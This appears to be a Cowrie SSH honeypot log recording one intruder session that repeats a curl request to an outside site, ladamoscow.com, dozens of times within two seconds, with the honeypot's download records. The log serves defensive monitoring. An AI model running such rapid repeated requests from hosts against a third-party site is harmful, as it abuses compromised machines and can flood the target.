{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.258975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.296642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.297673Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.335223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.336072Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.383267Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.384198Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.422251Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.423244Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.448837Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.462258Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.463349Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.487573Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","shasum":"3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.492588Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88 to var/lib/cowrie/downloads/3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.502693Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.503733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.528617Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.530220Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.543054Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.544136Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.567642Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.581950Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.583057Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5","shasum":"145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.586825Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5 to var/lib/cowrie/downloads/145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.620098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.621134Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.659635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.660652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.702556Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.703631Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","shasum":"3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.728364Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88 to var/lib/cowrie/downloads/3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.742432Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.743507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.746236Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.752193Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","shasum":"c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.767150Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599 to var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.788485Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.800147Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.801158Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.841619Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.842806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.881992Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.883073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.908395Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.920885Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.921959Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","shasum":"3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.947230Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88 to var/lib/cowrie/downloads/3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.959967Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.960912Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.997957Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.999018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.029494Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.039756Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.040809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.064319Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.079698Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.080698Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.119012Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.120037Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.152563Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.157610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.158533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.209548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.210496Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","shasum":"c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.230851Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599 to var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.247537Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.248516Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.288282Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.289297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.292857Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.308542Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.317740Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.330779Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.331755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.369815Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.371149Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.395500Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.431211Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.432261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.469326Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.470417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.513642Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","shasum":"c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.521568Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599 to var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","shasum":"c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.531217Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599 to var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.569240Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.570346Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/00b8a1f87bb00968cb762bc29b59189c8535fe4b961899b9cf132963982505ef","shasum":"00b8a1f87bb00968cb762bc29b59189c8535fe4b961899b9cf132963982505ef","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.631744Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 00b8a1f87bb00968cb762bc29b59189c8535fe4b961899b9cf132963982505ef to var/lib/cowrie/downloads/00b8a1f87bb00968cb762bc29b59189c8535fe4b961899b9cf132963982505ef","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.634009Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.635067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.665279Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.672003Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.672959Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","shasum":"3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.677138Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88 to var/lib/cowrie/downloads/3f41d172fa7913acb01bd39ba38170e435800ff3a6ab8d81fd1752aa9e9c4f88","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.753578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.754606Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.791539Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.792550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.830359Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.831913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","shasum":"c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.836060Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599 to var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.868956Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.869994Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.915487Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
